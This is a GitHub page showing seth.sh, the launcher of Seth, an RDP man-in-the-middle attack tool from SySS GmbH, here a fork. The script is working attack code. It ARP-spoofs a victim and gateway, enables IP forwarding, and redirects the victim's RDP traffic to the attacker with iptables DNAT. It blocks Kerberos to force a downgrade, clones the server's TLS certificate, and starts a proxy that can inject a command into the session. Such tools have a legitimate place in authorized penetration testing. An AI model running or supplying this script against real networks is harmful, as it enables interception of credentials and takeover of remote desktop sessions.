forked from SySS-Research/Seth
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathseth.sh
executable file
·139 lines (109 loc) · 3.97 KB
/
seth.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
#!/bin/bash
cat << EOF
███████╗███████╗████████╗██╗ ██╗
██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer
███████╗█████╗ ██║ ███████║ [email protected]
╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017
███████║███████╗ ██║ ██║ ██║ https://www.syss.de
╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝
EOF
set -e
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
if [ "$#" -ne 4 -a "$#" -ne 5 ]; then
cat << EOF
Usage:
$0 <INTERFACE> <ATTACKER_IP> <VICTIM_IP> <GATEWAY_IP|HOST_IP> [<COMMAND>]
EOF
exit 1
fi
for com in tcpdump arpspoof openssl iptables ; do
command -v "$com" >/dev/null 2>&1 || {
echo >&2 "$com required, but it's not installed. Aborting."
exit 1
}
done
IFACE="$1"
ATTACKER_IP="$2"
VICTIM_IP="$3"
GATEWAY_IP="$4"
INJECT_COMMAND="$5"
if [ -z "$SETH_DOWNGRADE" ] ; then
SETH_DOWNGRADE=3
fi
if [ ! -z "$SETH_DEBUG" ] ; then
DEBUG_FLAG="-d"
fi
if [ ! -z "$INJECT_COMMAND" ] ; then
INJECT_COMMAND="-j \"$INJECT_COMMAND\""
fi
IP_FORWARD="$(cat /proc/sys/net/ipv4/ip_forward)"
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
set_iptables_1 () {
local DEL_ADD="$1"
iptables -"$DEL_ADD" FORWARD -p tcp -s "$VICTIM_IP" \
--syn --dport 3389 -j REJECT
}
set_iptables_2 () {
local DEL_ADD="$1"
iptables -t nat -"$DEL_ADD" PREROUTING -p tcp -d "$ORIGINAL_DEST" \
-s "$VICTIM_IP" --dport 3389 -j DNAT --to-destination "$ATTACKER_IP"
iptables -"$DEL_ADD" FORWARD -p tcp -s "$VICTIM_IP" --dport 88 \
-j REJECT --reject-with tcp-reset
}
function finish {
echo "[*] Cleaning up..."
set +e
set_iptables_1 D 2> /dev/null 1>&2
set_iptables_2 D 2> /dev/null 1>&2
printf "%s" "$IP_FORWARD" > /proc/sys/net/ipv4/ip_forward
kill $ARP_PID_1 2> /dev/null 1>&2
kill $ARP_PID_2 2> /dev/null 1>&2
pkill -P $$
echo "[*] Done."
}
trap finish EXIT
function create_self_signed_cert {
local CN="$1"
echo "[!] Failed to clone certificate, create bogus self-signed certificate..." >&2
openssl req -subj "/CN=$CN/O=Seth by SySS GmbH" -new \
-newkey rsa:2048 -days 365 -nodes -x509 \
-keyout /tmp/$CN.server.key -out /tmp/$CN.server.crt 2> /dev/null 1>&2
printf "%s\n%s\n" "/tmp/$CN.server.key" "/tmp/$CN.server.crt"
}
echo "[*] Spoofing arp replies..."
arpspoof -i "$IFACE" -t "$VICTIM_IP" "$GATEWAY_IP" 2>/dev/null 1>&2 &
ARP_PID_1=$!
arpspoof -i "$IFACE" -t "$GATEWAY_IP" "$VICTIM_IP" 2>/dev/null 1>&2 &
ARP_PID_2=$!
echo "[*] Turning on IP forwarding..."
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "[*] Set iptables rules for SYN packets..."
set_iptables_1 A "$VICTIM_IP"
echo "[*] Waiting for a SYN packet to the original destination..."
ORIGINAL_DEST="$(tcpdump -n -c 1 -i "$IFACE" \
"tcp[tcpflags] == tcp-syn" and \
src host "$VICTIM_IP" and dst port 3389 2> /dev/null \
| sed -e 's/.*> \([0-9.]*\)\.3389:.*/\1/')"
if [ -z "$ORIGINAL_DEST" ] ; then
echo "[!] Something went wrong while parsing the output of tcpdump"
exit 1
fi
echo "[+] Got it! Original destination is $ORIGINAL_DEST"
echo "[*] Clone the x509 certificate of the original destination..."
CERT_KEY="$($SCRIPT_DIR/clone-cert.sh "$ORIGINAL_DEST:3389" || \
create_self_signed_cert "$ORIGINAL_DEST")"
KEYPATH="$(printf "%s" "$CERT_KEY" | head -n1)"
CERTPATH="$(printf "%s" "$CERT_KEY" | tail -n1)"
echo "[*] Adjust the iptables rule for all packets..."
set +e
set_iptables_1 D "$VICTIM_IP"
set -e
set_iptables_2 A "$VICTIM_IP" "$ATTACKER_IP" "$ORIGINAL_DEST"
echo "[*] Run RDP proxy..."
$SCRIPT_DIR/seth.py \
$INJECT_COMMAND $DEBUG_FLAG -g "$SETH_DOWNGRADE"\
-c "$CERTPATH" -k "$KEYPATH" \
"$ORIGINAL_DEST"